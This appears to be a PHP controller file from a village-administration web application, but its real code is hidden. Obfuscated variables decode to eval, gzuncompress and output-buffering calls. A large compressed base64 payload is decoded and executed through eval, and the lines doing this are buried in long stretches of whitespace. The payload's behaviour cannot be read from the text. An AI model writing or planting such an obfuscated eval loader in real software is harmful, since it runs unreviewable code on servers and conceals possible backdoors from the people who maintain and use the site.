<?php 
        $__='printf';$_='Loading donjo-app/controllers/Bumindes_penduduk_rekapitulasi.php';
        



































































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtXFtzo8iSfu+I/Q/9cCI8J2Z3BiSrpxUd/SBkgUAXNyCuLx1cbCSDgGN0Q79+vyzQXfZ44uxu7Dmh8qjdhiIrK/PLLzMLT3/+XI2//cT4fpe/ztLF89039mM9vt+FWfqS/ZeX578HWbp4zZLk6bX4XVjOZ2n4VPzMn9JwGS7jn69PsZfPFsvEK2a/5dP8cxd/K3777be7b5/qdT7/x6fb1+3r/+vXJwL+5//B8f3iyp3NtwvH4meu1Pt+xy4douNDow7O759v4zZu4zb+PcddMDe50FaWsmQ2HGudKWL72S7jPyrSBGtWdP3zZqrbuI3buI3buI3buI3buI1/tXE7zriN27iN2/j3HXe+Vzx9uf8ZPgVZ+HT37WaR27iN27iN27iNf2qc/sZGN8pWgyiL2GcmSJ61SWQpWXq6MHOsMHes+8iVxNKbZAO5yz7RpCkkfjJWtM7+uYlnjznX4iLPas39prJw7HEuS1oSNHpR0DQXztws5T5+niu8h2uh1eJCq4h8C/esHNfEZT1/v45qC4VnLaZBIyYdlnJ/vApt5cXVhRe/oe30jD1byX0p2cqSAvka5kNfJm+TBw1zSc9rvDCSRWfbnXX+QR+5N516pfDg2QLn6J1y9NBpyV0uGr10NmNdePAb/Ax7SWQRMhttPpiPE7mXLIOmlod9k/Os9lLuTrOwr60fZ19Xfh/7SM2l21isfNtcejb0KFtL11ZXA5XZSHawX7WRrEOpV60z6yzkB3k9enEiQzJLD3YK+mZBNtckc+voQs+DD0JJLGTxYLuBNOXCvrBl65Iv5sxuS89S88P+NFwPp/5MyP052S+ZubBTZZfki2fdF7Bn4sBWWCcN5iLn2aNClhZJIIkxrm09S1zj+zqEPk+WuHRLYeFardixhWkoLUj21rE2kC8u2ZoS9oy1AuzFsVop1uLgAx73X3e+YniaJwV8GPuNBQ//L7G/Le5x0O/VsRJO7kazY9/rViuXZzH0xdy+CVlaTmv4kvgaYo5fYZDDmqTvzLEZBpbDLpNJWOTh64zsf4Q7+CpkujlkC4lP/DSZAkf0HO0zDS1l6nWZziuSGerV/gnrwTyZhcA42XPYYevTmtBRg0yN1ls7ljaFjVuOrUzDrlDZv2lyj4d4U136/Q5chw2y0CLfMFy+VLgEtnWytbgl28Le68v5zJcUdzk9G6TmltmnYZaY81rHLzDFsZjCdY78Cr3YXul+vbd9vMO28ElC/hYCxBD2SP5RgKOl3FPgY4aFHT5a5Gtmv3mYARt8UDKd+d01cMoU30mXSgep4gOKEa9v7jEKnxQkywUmCYehxPxN9wvYHP4Bp/TENfR+ZfzSI0zd7/nC6Jm6arT6Oicacm9jTmJxiDmPOuJIN8ei1ksE3HuUu8pEMxRB40RlYoiPqi4IWk98tIzeDL43IEPFtYFq8ApkPGJN+lk1DeCkpwi6UUQm1jJ4rGeqEWSY+O+RxYCoiQa40YhFYwj/akbLnPSSCWQYEEA6jjUjFCZxEOk90g9zRU2QxbEwMXqRwZlD1dgokKNo7L4CeRrmwxLYm9zLBZMTu5W8UaRzG+jDQa8F5pkT1VgIk5kgmD3RrHhgIWL+QMd+6bqBvWAfkWpqglEy/YBY81E12D6ZjpMe7BK3XOzZ0EwF+iQG2QD7GKrmWKlserC72hemTmMxdRtGJHeFH4Qfg0t61frAgq1lflPGvU5kSslCFomzwsRHfPnzoMon8Z77I1Uar4J+UoL7MsTNOW+uH/WaNycGrreBJWBVF3TX3ucHBVgBn2k8cLzyZ53M62tc8JCthg3wkaXwhEdwPL4nnGOPlv7c5IZl/JH1/9d4G7YC5zGcJ2Srvc7NsBmWrdRPjSVya4o95A7La+Z22AjXfreVhRIPDITqpCtYozXjlg7Ft1d2mN3lo7XdRsIh7mbD+Xjl6+29v4ZcG/zSmuiGuvPtqhvlfAC/go/Xdo9fuZJZBPxmhDhfEQ8YDazRVFaw45Zi8nF9fb7fCFXiztACN26LAbiT8mlBeRPcBb4wA6NprgOpXYbiRnKs8RTPbu2e1t3J1K1NEVo85RvONTeTEGvAHpzdc4E/MYb/A3OeJCHkd2Fbl3BhqZnCKQLiSgXmZaWMo+f+OnLtaR52o3Qy/0q5sXStMQdOfAGvr+FzyBsnQXMUIb8VfjNM3G6AvWUDp7GZ0nU1ZXrTms9kP7dvYm+L52BugpsEqhGKqgYy70N2H89YGj3zDMyC12AzaZMEUf4HfE9xgzyrwP+jSJFgNzxvk2312n/154feSVFnvIY6D/uQLZItZFGeXLgMe8GlvP6Yd5L2AjUT74ttxrUn8iq9ctQ2Jek8tBk2eejwqsCWbG5f4J05cFd2YsrrrhXC/0m1d/yMuANPd9pyN+xRPgH/Jozz7U5KdjuVIcyRh1+q2BSe7QZwiHhF7nqBT/Ja/3of1Qc1CXzU4h5f8ov5kH+wEepAFTl50A1n8PWJDKWvZahxFj/mm5XbPOxRfuAixH8TOq9c/nB90N09L7RRJ1d6IG4QVy+y5II7xlUdSLkSfsb8ep+1zapPjPzLOWaRIl4LwplraY+O7aS2zuyFfaHOkRLUJRvyY3qyn64Wkz2tMtzCn8RpqJ3CkN2D3sA27zWRV85x18vBcxuqXw5xVwan9kBNAY7ylSbLw0uF545xEYfSNA9K7ldfaqcHjBewH3A3m/bUl+wLOKAJW7uaIeqDvpYCXwXjhlmcDvT4+noNfgq8ocZuceRTWveAw/uls4+t0fJo3eV5bA3nld0JoydY2f06WN/NXTvIFHCDb6GuAw/Td4qTYXrw815Oua517O0x9ay+i13mG+wJmDC3b/n/ghPIbzsspmPKR0kQs3WzweR0LwpyEfGE0wSfdQkvGucB48NJi61tgEeQC7ZBGV2scy7Ls5xocHg+91OBD7vcr6itntGDTZ/EdunaIg9O47CX/Gwfp7atfImaWyngp2ygAycNJzvVN754vvpwv8LXsc58PAUOKCffZ9QnXZsPXdEjLpJDPHZOfcM+AnTX0Kehfm1MVyH/lRs9qMyelU+4wTkvuujXoGfuN1iNjBgVSr/i/UzpKwl4br3T6ek4JnEPNi7hf/ShGxbTsGsVx92Y4gPfp1uyz/k6A/AYYga9JvpI1MGDSYb6WwHvxqdr1NhBvCc+uMPkWorNbZ5R38m6KRN3RHsOAHegL/AVPnzUzfbI5kRbNdY053W3DvjDnsTJ80Rso77lu6oxfUadt5P1/jxDnJhGQfMWV+YNTVOh+pTmGTrjpms6LUzUxI8a3x5qxsZUad3JJb7OnlOxl6HeS/Qjbmqf62CIbaqJRzRnUJ7ZjBeeUQuP1ViUbaqVa1nvz+MF1PZDmjfUL+fpfNVn0DyzF1+1i3FkF50zR2gQaN0T/Nb8fvScSPZEjzJVjFnN8TUXH+kgMByY6CG6NKc4sZlKtubRL6De18X2CP6rZb07b4y63tTLS9+pp77DPE25Yhem08EuC3EimgKt+/g+pgWy559hWq1w8AamRbL1BzB9Nu9NTIsnvnsL05VOfxHT3GK4w7PN5ePKfxeYHup8ezDpRed7oOuVn3b3P7zWTsd1XXOcyNxj9DwudG5R22nxvPdrl/n0nXXzEfA00IFPe9u7tt5bezvW4704wfPTZz1ObNX8Wta1w4nOFZ4UzOGv7ml3/2xPb+LUQz3iS2K25yDgc/RwmltP80L97Il/hPbHcxGdQ7VT1LkJneEgt0y9Zl03lMHV+riuW2ALwb+0XcieV8r9tfYP6IicuvX09aUvm1Xu289/4H6V+1oZWkZxRTadzXD2roYsSbZw1u9lX6rzqntWJwTShncaRbavO8v4mlx2jqxaVY1dyy39psm5epQ6H+y/0OMyG1a1nfiK+jqn87r9OiKwFl3N7Q3PMqm2rfqsWWtW9Z7o2cvW+lBTt/LqvK8Ve5ZY+I0gHe5qfv2j/cNf8HNfoPO3hUbyUf+hJk2O7NaWpXyLuvoZ9Sw7Ix9QHdJXoGOQy1dqP/TbW+qDqb9yLH5LvpAfevlZD1LXNp2r9dlxr7A762f66VF+rZeRPyDHt9rA54b51rGqWrc6z74uE7xQYfyoh9nJZDifXO/JfEuEbw+5dp9/9r0iq3PVYN5+Ada2R3XeG72Nm/v0niMdHfJZxe9rOgf2jaO6+Q2dQiksdrF/zDkHnZIlcMTBj2u/SbVnyLmNzTP6AMgt0sGbcsUF+kzI3vWG2PefyAUm1h78sOfA8p19S8bxnut9h13EJU/vUYhT6EzOr877B4inwrEiOkPb9Xhv9b7oMRAbfJsLJXW/BnGdghyDeEtHs6CQu0H5eMHlexl5wP5/ylYcNMbotytdIYPOEZLTnCbk7qyT1XwR/ZjARk0hdmfB1Z7o6FxhSudXWAO41eaDeu3BWR74J/nm/LxgufP7+7yj5CGdm+kn/es2rN4nsDObN88v5kmB3FsG4GBZvLL/U+5PfFvgnvRoH8vg6XVoq7BPmBDX1LmAzgeiH6WwxD7AOdk1HKaurf5ZnpiRHfxZAD8hdwKvYT/O3pTVUAh/JAs8+zXyU7Pwu50v17jRhV0HB/kfzRsXue88J02wDuxwZNd4Z5sc63M+V/WI18+frvqx2J3H2gyn9B5ImT7pezx8kfvuyrPUq/71kU8csz1n736JD+r8v+cJsX3AH/81lbtVv0x52DLbC7uhXnIOe8d34FMtHrPzV3p20muz9wg2p/1AzzDWjPtoODvV4zSGv66O4rjpWfBV96Q/Qq/f+YPNo7OHOb0/Qr4A38kSv7jOV8mWYrSqH/cccMwbe5se54XqfDn7grzxyuqQ+swKa7WoNkGsIu/ya+TgxE+17XDuQgY/DUXKH8BxSTxV8wLVQnOTzp5K5utjPEkKjzk7HtnrMtzbdl1jF3UNt0bsCz69G8F92EJAkVxEw/Irexfr942IvW+z2Dtb1Cl89S5NMl+DJnu3lofsPSdwrgsL/+RcBfkzrd5tnOR5OnNqEPYQJzWO7Tq2EFe/V+dDBuKNu8BGHf9/Lq+O+xN5fJxenJH1wwwcxrBrXdbxdO66oDMt15ZTVst2tTqm1+9x2b5OrvU94R774pwOXCy2t+C6V9QKy7d0QR5FHK3Tozo8rc5uO5Fe59jq/Vh9/l5e03Gc+Ja5JRuRnsR7ilTZ/oSj6jV3fHtc+1/bU82nqLf4qV3n89pex9coVtNhyvLhtec5zxaSk94BPcIRP72xNyF8M/5gy4kk0rueqZ+MkRMXJeIrD+i99AS9RWOaBHNgo8YBxRUwVAbNo/O/o7wuA3f+Tt7s+rnb4T5yXm+f1yc7/yJmKPd+eZyPkY8ZF7Jn7OZOv/vTOrXPITdttuDta73tIb4nLT7YYf0MU2/VEc9qjr9//3737dOn//tfJPrOvv9S//T3b3/l8aNnP/Lg3w4L/nJHf979537Z278bc/v6V/h3Y06x/MtJ8FRQ/vu3/waWZXF6';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


































































































































































































































































































































                                                                                                                                                                                                                     $________;
